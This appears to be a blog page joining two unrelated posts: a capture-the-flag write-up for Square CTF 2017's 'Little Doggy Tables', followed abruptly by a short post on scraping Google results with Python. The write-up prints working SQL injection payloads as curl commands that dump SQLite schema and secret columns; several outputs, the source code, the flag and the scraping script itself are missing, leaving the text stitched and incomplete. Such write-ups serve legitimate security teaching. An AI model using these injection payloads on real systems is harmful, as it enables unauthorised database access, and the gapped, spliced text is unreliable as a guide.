Write-up: Little Doggy Tables, Square CTF 2017

This is a write-up for the challenge Little Doggy Tables from Square CTF 2017.

The challenge can be found here: https://squarectf.com/challenges/little-doggy-tables

The challenge requires us to use SQL injection to extract the flag from a table in the database.

On running this command:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=Fido"

I got the following output:


Which means I can run SQL queries through this command.

Furthermore, the challenge details also include the source code , which looks like this:

From checking out the source code it is obvious that SQL injection is possible and that SQLite3 was used in the database.

To check if it was working, I ran:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename='"

Which gave this Output:

Internal Server Error

unrecognized token: “‘\”;”

WEBrick/1.3.1 (Ruby/2.3.4/2017-03-30) at little-doggy-tables.capturethesquare.com:443

Now that I knew SQL injection was working, I had to access the meta data. Unfortunately, the information_schema table does not exist here since it is SQLite and not MySQL. I searched for an equivalent table in SQLite and came across this question on Stack Overflow:

Which gave me enough to realize that sqlite_master is the information_schema alternative in sqlite. I changed commands mentioned in the answer to the to suit my search.

All meta data in sqlite can be accessed simple by using the command:

select sql form sqlite_master

So I modified my payload to:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select sql from sqlite_master-- -"

Which gave the output:

CREATE TABLE operatives (
codename TEXT,
species TEXT,
secret TEXT

Now we know both the name of the table and the name of the required column which is  obviously secret. The SQL query now required to be executed is:

select group_concat(secret) from operatives

The corresponding payload would be:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select group_concat(secret) from operatives-- -"

The resulting output:


On refining the above output we get that the flag is :



Google Search Scraping With Python

Python is a language that allows you to do great things with very little code, it has a great set of powerful libraries and packages. I hope to illustrate this here by demonstrating how you can scrape results off a google search using a very simple and short python script. Older versions of such scripts were dependent on the ajax google api which no longer work, this is an alternative approach.

The way this piece of code works is by using the two modules ‘urllib’ and ‘requests’. These two modules are at the centre of this piece of code. The ‘get’ function of the ‘requests’ module is what allows you to access the specified url and the ‘urllib’ module allows you to read the urls on the page and store/output them.

For this code to work, you will also need the lxml library and the CSSselect python package. These are needed to process the formatting of the results page. lxml does not need any installation and is widely used in python scripts. You can download their package, and read their documentation here: http://lxml.de/

Now for CSSselect, you might get this error if the package is not installed on your system:

To fix this you might want to download the CSSselect package, which you can do from here: https://pypi.python.org/pypi/cssselect

To install this package run this command from the directory where the downloaded .whl file is located:

After doing so, you can run the script and/or use it in your own programs to scape off google search results. Have fun!